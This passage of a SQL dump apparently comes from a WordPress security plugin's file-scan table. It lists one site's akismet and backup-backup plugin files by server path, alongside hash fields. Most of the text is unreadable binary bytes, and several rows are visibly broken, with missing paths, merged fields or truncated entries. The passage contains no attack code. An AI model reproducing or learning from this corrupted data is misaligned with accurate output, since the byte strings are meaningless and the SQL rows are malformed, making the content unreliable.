qE9g:I','v26}۞\Z\nog$$@[C\\V','',0,'?'),('H![?z>','wp-content/plugins/akismet/class.akismet-rest-api.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/akismet/class.akismet-rest-api.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','⺅:K7&Z9Hc','*F:Å=IH\'x\\\"\':','',0,'?'),('lg<=l','wp-content/plugins/akismet/class.akismet-widget.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/akismet/class.akismet-widget.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','HLB_\0qlR','z@KW3ԣS}fS\"ڌo\'','',0,'?'),('pb~oBkZ','wp-content/plugins/akismet/class.akismet.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/akismet/class.akismet.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pJ|mn=','ƻSX >qpT,0I','',0,'?'),('A$h՝`Qa','wp-content/plugins/akismet/index.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/akismet/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h PZݢ`Ef','}5e 33mhyDQ(','',0,'?'),('o/d4x`','wp-content/plugins/akismet/readme.txt','/home/tummmyov/tummyrevolution.com/wp-content/plugins/akismet/readme.txt',0,'0A<','0A<','\ry`LbT$B(\"','',0,'?'),('!ۅ.4qdtP','wp-content/plugins/akismet/views/activate.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/akismet/views/activate.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{ETJ_qn','·^\nbqGw','',0,'?'),('>Zbo&','wp-content/plugins/akismet/views/config.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/akismet/views/config.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')}','D]b5<\\T۫A%$Ɍ %D}Y%','',0,'?'),(' OKN\0Yn\" a','wp-content/plugins/akismet/views/connect-jp.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/akismet/views/connect-jp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W߀','6-݅A\r[*wXyA!p;.߼2S','',0,'?'),('\'\"znpaE','wp-content/plugins/akismet/views/enter.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/akismet/views/enter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',}|݂؃m','$w~őt- PElFX','',0,'?'),('bE3g\'cZ (','wp-content/plugins/akismet/views/get.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/akismet/views/get.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Kh?t Y',':2[I;nUYY!ⵄ>XZ','',0,'?'),('F\n[ =66\n','wp-content/plugins/akismet/views/logo.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/akismet/views/logo.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','IW:ג|6ӝ','},x0#N8KSŐlT`>~^b','',0,'?'),('Wd;C\rO','wp-content/plugins/akismet/views/notice.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/akismet/views/notice.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ܦl[]A6%','o\rqGd/? ?T\"$','',0,'?'),('w#Q ','wp-content/plugins/akismet/views/predefined.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/akismet/views/predefined.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#>ajϬa4','wsbN}qY7zoUu\'1','',0,'?'),(' }spK :','wp-content/plugins/akismet/views/setup.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/akismet/views/setup.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','eY]Z.^<&Un','G,|8i1<2,8+w','',0,'?'),(';;/JKmR0','wp-content/plugins/akismet/views/start.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/akismet/views/start.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x( (:',' 3`+BvY-k-^?&','',0,'?'),('sӣJ~k','wp-content/plugins/akismet/views/stats.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/akismet/views/stats.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^= -mWwxgPO',' .-[\r Wy\n%BnQbBw','',0,'?'),('k8Q?<׊ yp','wp-content/plugins/akismet/views/title.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/akismet/views/title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','XCN3|)-2Na','tCz n`j\rMN\"Ag','',0,'?'),('dF=jHc','wp-content/plugins/akismet/wrapper.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/akismet/wrapper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']x\"YKJ','\ZIa^iJH:j:bŠ','',0,'?'),('FI =IIw/@','wp-content/plugins/backup-backup/admin/css/bmi-plugin-icon.min.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/css/bmi-plugin-icon.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"̪SlK','k܏R^b=*PwB','',0,'?'),('\'iqT℅','wp-content/plugins/backup-backup/admin/css/bmi-plugin.min.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/css/bmi-plugin.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0֓@qRĚ','Q!\r3Lm/Y\"A','',0,'?'),('4>BӝhH','wp-content/plugins/backup-backup/admin/images/002-monitor-white.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/002-monitor-white.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_RS-[ q߫','Ud*79Z6G2ƕ+Y P','',0,'?'),('*0?[aq','wp-content/plugins/backup-backup/admin/images/Amazon.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/Amazon.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%//_z',' &\nޝحb[UǾ_Em?','',0,'?'),('qONi#>^','wp-content/plugins/backup-backup/admin/images/alert_error-min.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/alert_error-min.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9FhA(6Dh',': (5hL~,Rd .!\ZC6','',0,'?'),('x\\`H','wp-content/plugins/backup-backup/admin/images/alert_info-min.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/alert_info-min.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Hh%WU6','%Cc䃸 ?ը %ӍyYeu','',0,'?'),('l{:','wp-content/plugins/backup-backup/admin/images/alert_success-min.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/alert_success-min.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z\07t(','O7-Bp)I@LFapQ','',0,'?'),(' wn=\ZHQu~/','wp-content/plugins/backup-backup/admin/images/alert_warning-min.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/alert_warning-min.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y ˟䳭@i','e_lT|!','',0,'?'),('g>\Z#&@','wp-content/plugins/backup-backup/admin/images/arrow-min.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/arrow-min.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',': +wL,D-','{F`bT qc vE%Nʘ','',0,'?'),('D* zj)]Y','wp-content/plugins/backup-backup/admin/images/backblaze.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/backblaze.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';3: @tz','B\nL.:Dv)ʷ\"|*S','',0,'?'),('3l:utl+r','wp-content/plugins/backup-backup/admin/images/backup-min.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/backup-min.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{d\\X$/)D','\"sb%F\\ \'N~(HR@&ZC','',0,'?'),('=)9S6I.rR','wp-content/plugins/backup-backup/admin/images/clocks-min.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/clocks-min.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','aw{ɹ\"S(','a2\\JS*%Jx}^~g&Bu','',0,'?'),('ݳNij','wp-content/plugins/backup-backup/admin/images/close-min.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/close-min.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\rXq{P:','MM\'q n©]5>P6#ӝ','',0,'?'),('XQz3p@','wp-content/plugins/backup-backup/admin/images/copy-icon.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/copy-icon.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qw{̝_\'','\rbw.r.N,:Xa%|/','',0,'?'),('|e VC!j','wp-content/plugins/backup-backup/admin/images/copy-url-stg.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/copy-url-stg.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o=-,GzC\'F z','| K[#ong*;R','',0,'?'),('Έ*\\#\0:o\Zz','wp-content/plugins/backup-backup/admin/images/crown-bg.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/crown-bg.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V 632x W','43_P<~o8]Ǩ )m','',0,'?'),('}m[JPx','wp-content/plugins/backup-backup/admin/images/download-min.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/download-min.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' Ph/dQ','GNl7xnQnuswia_','',0,'?'),('v/avu','wp-content/plugins/backup-backup/admin/images/dream-objects.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/dream-objects.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{ʃ','L(*Cb>(18\\ӥ','',0,'?'),('2FL/','wp-content/plugins/backup-backup/admin/images/ftp.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/ftp.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','̵D ~k1','%n?7vvyYdu),\Z_','',0,'?'),('3l()','wp-content/plugins/backup-backup/admin/images/google-cloud.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/google-cloud.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','DfXl̗','#P{:\'\0NĴPDM5G,d\"?','',0,'?'),('XގnE8_x','wp-content/plugins/backup-backup/admin/images/google-drive-mono.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/google-drive-mono.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kØv HY)','k/tsќ36Z{Oŏ,','',0,'?'),('`\ny@eƧ0 $','wp-content/plugins/backup-backup/admin/images/google-drive.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/google-drive.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_ 1y.!\'','򠈀Zg(F{[TICILF','',0,'?'),('V2/Q;*x','wp-content/plugins/backup-backup/admin/images/happy-smile.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/happy-smile.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','MV*nM@8\\','q|̝#=jÇ$Ɂ@z','',0,'?'),('zptv?]4Ѫn8U.','wp-content/plugins/backup-backup/admin/images/info-min.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/info-min.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h7!}I-','dWYѦԏ~ҜxӛI','',0,'?'),('3GP@ii*)','wp-content/plugins/backup-backup/admin/images/kitty-cat.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/kitty-cat.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','HfKW-c','qζFjE*%r@̫h2h','',0,'?'),(' U3xvR4 ','wp-content/plugins/backup-backup/admin/images/link-min.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/link-min.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','fK\"\Z\"*j',' Jh\rt\\G=3HFl/\n','',0,'?'),('w#񕎠','wp-content/plugins/backup-backup/admin/images/local-server-2.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/local-server-2.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nFb=&x','2뻷h`E(E%>JDsďb{','',0,'?'),('`t魸St','wp-content/plugins/backup-backup/admin/images/local-server.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/local-server.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m#KLT+','%/2.B]|7Z&`goh','',0,'?'),('5qf r','wp-content/plugins/backup-backup/admin/images/lock-experimental.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/lock-experimental.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H^w\n','X?>w561\nf','',0,'?'),('{]5&^Ucd','wp-content/plugins/backup-backup/admin/images/log-min.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/log-min.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^›_p/;5T','hjnyG>{xf9','',0,'?'),('J _p-','wp-content/plugins/backup-backup/admin/images/logo-min.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/logo-min.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Aā|1 bY\Z','7 0~hUqdm)Q','',0,'?'),('9Q#g6\"2_Ek','wp-content/plugins/backup-backup/admin/images/logo.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/logo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z܀ef󿢸pJ>','6\rh C\0fƥ&ɥx\n&','',0,'?'),('_dcq1Ak ','nDhiqO\0O hǧD#ݾ71~','',0,'?'),('MsfE','wp-content/plugins/backup-backup/admin/images/minimize-min.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/minimize-min.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?\rr\r{iL$~\"','UjNH\rx#Z2%}~|ty4','',0,'?'),('{RPe`','wp-content/plugins/backup-backup/admin/images/next-icon-min.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/next-icon-min.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w^f^,','1dO=GF+{+g3rnE','',0,'?'),('B|Cm>4IKx','wp-content/plugins/backup-backup/admin/images/nut-big.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/nut-big.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','( \0>ؚI TV','#cҋNr_mHܪR&NE,:','',0,'?'),('FXCIXO','wp-content/plugins/backup-backup/admin/images/nut-mid.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/nut-mid.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',߃6Lk +','#;2$.\"oN^ |ڥ5p8','',0,'?'),('V,gcy','wp-content/plugins/backup-backup/admin/images/nut-small.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/nut-small.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-qklV6E','bD/x$aXJŸܬ3Eu','',0,'?'),('KlÝ.q','wp-content/plugins/backup-backup/admin/images/onedrive.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/onedrive.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~$p','@%|t8y!&:L)\'ΫZi','',0,'?'),(' wk-pP','wp-content/plugins/backup-backup/admin/images/openstack-swift.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/openstack-swift.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','wf,ܼx','۪ϙ!SrQih Ҥ`~\0̓M','',0,'?'),('}\Z{FvsHTx','wp-content/plugins/backup-backup/admin/images/pen-edit.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/pen-edit.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U`y5M',',vFf^lf\'G.?\\,','',0,'?'),(':W`ytV k','wp-content/plugins/backup-backup/admin/images/premium.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/premium.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/sĄtby','',0,'?'),('ٖuN','wp-content/plugins/backup-backup/admin/images/stars.gif','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/stars.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9ul(6','Vޓ>5qpaXpX\rtK','',0,'?'),('.\Z9n@M\\?\r\Z?','wp-content/plugins/backup-backup/admin/images/stg-bg.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/stg-bg.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rD[','yin&ᓘ4)zwjݢuv','',0,'?'),('Mf N8?','wp-content/plugins/backup-backup/admin/images/stg-check.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/stg-check.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k8]/ ē])','\' u/@Y ;64','',0,'?'),('rC$dשKv','wp-content/plugins/backup-backup/admin/images/stg-creation-bg.jpg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/stg-creation-bg.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','̖-ᶦ','i&\r泲\n(RL6Gs.','',0,'?'),('Vf%\"1L]Ry','wp-content/plugins/backup-backup/admin/images/stg-new.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/stg-new.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+Z^E@\'U<','!uk!\'#Pg','',0,'?'),('Ԇ=\ZV[ 액a','wp-content/plugins/backup-backup/admin/images/stg-restore-btn.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/stg-restore-btn.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C`ͮLcI5O','KT\'Y.$\ZXi\Z==or4','',0,'?'),('$9k*^g}w]','wp-content/plugins/backup-backup/admin/images/success.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/success.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v -޷AJY.','?\'\Z@5LjI]`om ','',0,'?'),('QYB\\4<՚#','wp-content/plugins/backup-backup/admin/images/support-1.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/support-1.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ldim,6 ','c5=M(x[xk','',0,'?'),('5eIʰG','wp-content/plugins/backup-backup/admin/images/support-2.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/support-2.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' s JlGrc#L','@{4K/^uʛt8j','',0,'?'),(' \"NMHx/*','wp-content/plugins/backup-backup/admin/images/support-3.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/support-3.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xx7QntQ','7q ֙˛y$v~) ܅n','',0,'?'),('8ٜțQ','wp-content/plugins/backup-backup/admin/images/thumb.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/thumb.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b{AG*?O*f','KD}Yg*\ZIpx-<:MyMW\'O','',0,'?'),('Ռx1֘E','wp-content/plugins/backup-backup/admin/images/timemachine.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/timemachine.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?udt$','l*p7ÖۄԷn, #V','',0,'?'),('Z-&^Ri','wp-content/plugins/backup-backup/admin/images/tlogo.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/tlogo.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e\Zk(k',' _0ԩ_ #GOyXL0+g\nHn','',0,'?'),('U4>JRحF\'F','wp-content/plugins/backup-backup/admin/images/trash.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/trash.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','߬x[\n-1-','̨B62r*#vd\0J:[zB;','',0,'?'),('f4oDž`\\ppW','wp-content/plugins/backup-backup/admin/images/unlocked-min.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/unlocked-min.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+q:֕]k=r b~Ϫq+','',0,'?'),(')G\'Jݑ܆ ','wp-content/plugins/backup-backup/analyst/assets/img/smile.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/analyst/assets/img/smile.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ǽ9\\ʥyaM',')KV','k~ UH\ZxPĀ<;X','',0,'?'),(',ŒSHJ','wp-content/plugins/backup-backup/analyst/assets/js/customize.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/analyst/assets/js/customize.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[ʷF&)zܭ','~lp7^8q7M4?,tlekZׂ','',0,'?'),('\n bՉB3','wp-content/plugins/backup-backup/analyst/autoload.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/analyst/autoload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(m\rZ\Z>]m','wUD-\r?aӭ\"}8','',0,'?'),('=k_~\"4','wp-content/plugins/backup-backup/analyst/index.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/analyst/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+MjL\'',' ~UJQN P7˵d','',0,'?'),('P\" RAMU','wp-content/plugins/backup-backup/analyst/main.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/analyst/main.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x5uR','EJI[DrMX \'(x(ƽeL','',0,'?'),('ƻ$Jj=~S$z','wp-content/plugins/backup-backup/analyst/sdk_resolver.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/analyst/sdk_resolver.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#tF6yb','@Wr\Z+edRW\\h-+;U7','',0,'?'),(',µܥ2w$Ь','wp-content/plugins/backup-backup/analyst/src/Account/Account.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/analyst/src/Account/Account.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v&3UBȑ','-9n砺K S_t:\0;@$','',0,'?'),('+89@Zbf:','wp-content/plugins/backup-backup/analyst/src/Account/AccountData.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/analyst/src/Account/AccountData.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F/\0Ǘm','Eu80mb!Vd\Z?* O[Q]R','',0,'?'),('bQHK(>Ѭ','wp-content/plugins/backup-backup/analyst/src/Account/AccountDataFactory.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/analyst/src/Account/AccountDataFactory.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}$vM','|ol_S i>)DEnݐ','',0,'?'),('!>aSJ$','wp-content/plugins/backup-backup/analyst/src/Analyst.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/analyst/src/Analyst.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$YͶp~KhWa','j\nXo @8*RPf]ĩUS*','',0,'?'),('',',]{sm|mS3ڕHsN7','',0,'?'),('Vck\rS(Q\nI','wp-content/plugins/backup-backup/analyst/src/Contracts/HttpClientContract.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/analyst/src/Contracts/HttpClientContract.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#꽢8H9Sf ','0{\' ԅv(=c=gJÎ','',0,'?'),('ST \"lڍ','wp-content/plugins/backup-backup/analyst/src/Contracts/RequestContract.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/analyst/src/Contracts/RequestContract.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{ˀ.','A{?jOB~o,yrBS{t','',0,'?'),('ڃHFDh3','wp-content/plugins/backup-backup/analyst/src/Contracts/RequestorContract.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/analyst/src/Contracts/RequestorContract.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g\"2\'M+X','e7w޻iź_)6Mp\0:r[','',0,'?'),('pHM]EcF','wp-content/plugins/backup-backup/analyst/src/Contracts/TrackerContract.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/analyst/src/Contracts/TrackerContract.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ƾHu!-[','^P.d¼>F9w^BH}X','',0,'?'),('Fi/v4jI*1','wp-content/plugins/backup-backup/analyst/src/Core/AbstractFactory.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/analyst/src/Core/AbstractFactory.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','vDPKBT','خR_V_vɝy\\ՅE\Z(','',0,'?'),(' V>3<$','wp-content/plugins/backup-backup/analyst/src/Http/CurlHttpClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/analyst/src/Http/CurlHttpClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Mr4lcEY:`',',k/i]ݕ{t\njt','',0,'?'),('}10{I{kj.\n','wp-content/plugins/backup-backup/analyst/src/Http/DummyHttpClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/analyst/src/Http/DummyHttpClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7u[/L\0ԣ','*A+}BqFS@_]@MV','',0,'?'),('_ǃd@0][d','wp-content/plugins/backup-backup/analyst/src/Http/Requests/AbstractLoggerRequest.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/analyst/src/Http/Requests/AbstractLoggerRequest.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5=i%DWwz','xy+֥k0Psdy','',0,'?'),('wSgERU','wp-content/plugins/backup-backup/analyst/src/Http/Requests/ActivateRequest.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/analyst/src/Http/Requests/ActivateRequest.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%gG_kO9*GS','Mny;yx5)\'\\&\0fȄ','',0,'?'),('R(Fq/:0','wp-content/plugins/backup-backup/analyst/src/Http/Requests/DeactivateRequest.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/analyst/src/Http/Requests/DeactivateRequest.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l7}x','N\r@Q|/{먲,\\x','',0,'?'),('2Ci,о','=|PT4x]N)u0wPk~','',0,'?'),('B58^SW','wp-content/plugins/backup-backup/analyst/src/Notices/NoticeFactory.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/analyst/src/Notices/NoticeFactory.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6SϏYF\nqn',':Fu|CH 